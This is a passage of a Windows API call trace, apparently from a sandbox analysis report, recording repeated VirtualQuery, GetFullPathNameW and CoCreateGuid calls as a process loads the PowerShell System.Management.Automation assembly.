lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: 
lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.592] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.593] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x994e574b, Data2=0xaa08, 
Data3=0x4b8b, Data4=([0]=0x93, [1]=0x95, [2]=0xfa, [3]=0x26, [4]=0xfd, [5]=0x17, [6]=0x25, [7]=0xd2))) returned 0x0 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.596] VirtualQuery (in: lpAddress=0xcb300, lpBuffer=0xcc1c0, dwLength=0x30 | out: lpBuffer=0xcc1c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.596] VirtualQuery (in: lpAddress=0xcb390, lpBuffer=0xcc250, dwLength=0x30 | out: lpBuffer=0xcc250*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.624] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.625] VirtualQuery (in: lpAddress=0xcb5b0, lpBuffer=0xcc470, dwLength=0x30 | out: lpBuffer=0xcc470*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.627] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.627] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1352ac50, Data2=0xf812, Data3=0x410b, Data4=([0]=0x8f, [1]=0xb4, [2]=0xf3, [3]=0xd5, [4]=0xe2, [5]=0x7b, [6]=0xe, [7]=0x37))) returned 0x0 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3c3f4f8d, Data2=0xc9c0, Data3=0x49af, Data4=([0]=0xaa, [1]=0xf9, [2]=0x20, [3]=0xfb, [4]=0x84, [5]=0xa9, [6]=0x8e, [7]=0xd9))) returned 0x0 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.632] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.633] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x139a6372, Data2=0x1b45, Data3=0x466b, Data4=([0]=0x9f, [1]=0x73, [2]=0xac, [3]=0x77, [4]=0x94, [5]=0xb7, [6]=0x1, [7]=0x82))) returned 0x0 [0135.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.635] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa0d07fb7, Data2=0x4766, Data3=0x49e8, Data4=([0]=0x9d, [1]=0x62, [2]=0x40, [3]=0xaf, [4]=0xf0, [5]=0xd1, [6]=0x5b, [7]=0x2e))) returned 0x0 [0135.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.635] GetFullPathNameW (in: 
